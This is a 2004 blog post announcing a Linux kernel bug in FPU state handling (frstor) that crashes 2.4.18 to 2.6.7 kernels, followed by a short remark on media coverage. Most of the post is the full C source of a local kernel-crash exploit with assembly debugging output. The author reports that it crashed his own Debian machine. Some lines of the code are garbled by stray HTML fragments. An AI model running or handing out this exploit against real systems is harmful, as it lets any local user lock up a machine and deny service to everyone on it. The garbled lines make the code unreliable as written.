posted on Wednesday, June 16, 2004 3:43 PM
by
demiliani
Crashing the Linux Kernel
In these days on the Linux Kernel Newsgroup a big alarm comes out: a bug on the Linux kernel allows a simple and little C program crash the kernel (both 2.4.2x and 2.6.x kernels on the x86 and x86_64 architectures), effectively locking the whole system.
The little code is this:
/* --------------------
* frstor Local Kernel exploit
* Crashes any kernel from 2.4.18
* to 2.6.7 because frstor in assembler inline offsets in memory by 4.
* Original proof of concept code
* by stian_@_nixia.no.
* Added some stuff by lorenzo_@_gnu.org
* and fixed the fsave line with (*fpubuf).
* --------------------
*/
/*
---------
Some debugging information made
available by stian_@_nixia.no
---------
TakeDown:
pushl %ebp
movl %esp, %ebp
subl $136, %esp
leal -120(%ebp), %eax
movl %eax, -124(%ebp)
#APP
fsave -124(%ebp)
#NO_APP
subl $4, %esp
pushl $1
pushl $.LC0
pushl $2
call write
addl $16, %esp
leal -120(%ebp), %eax
movl %eax, -128(%ebp)
#APP
frstor -128(%ebp)
#NO_APP
leave
ret
*/
#include <sys/time.h>
#include <signal.h>
#include <unistd.h>
static void TakeDown(int ignore)
{
char fpubuf[108];
// __asm__ __volatile__ ("fsave %0\n" : : "m"(fpubuf));
__asm__ __volatile__ ("fsave %0\n" : : "m"(*fpubuf));
write(2, "*", 1);
__asm__ __volatile__ ("frstor %0\n" : : "m"(fpubuf));
}
int main(int argc, char *argv[])
{
struct itimerval spec;
signal(SIGALRM, TakeDown);
spec.it_interval.tv_sec=0;="BR"> spec.it_interval.tv_usec=100;="BR"> spec.it_value.tv_sec=0;="BR"> spec.it_value.tv_usec=100;="BR"> setitimer(ITIMER_REAL, &spec, NULL);
while(1)
write(1, ".", 1);
return 0;
}
// <<EOF
and I can say that works good (my Debian has crashed).
Obviously... as usual, when a big fall is about a Linux system, the rumours are not big... can you imagine the big clamour if this fall was discovered on a Windows kernel? 
HERE you can find all the details about...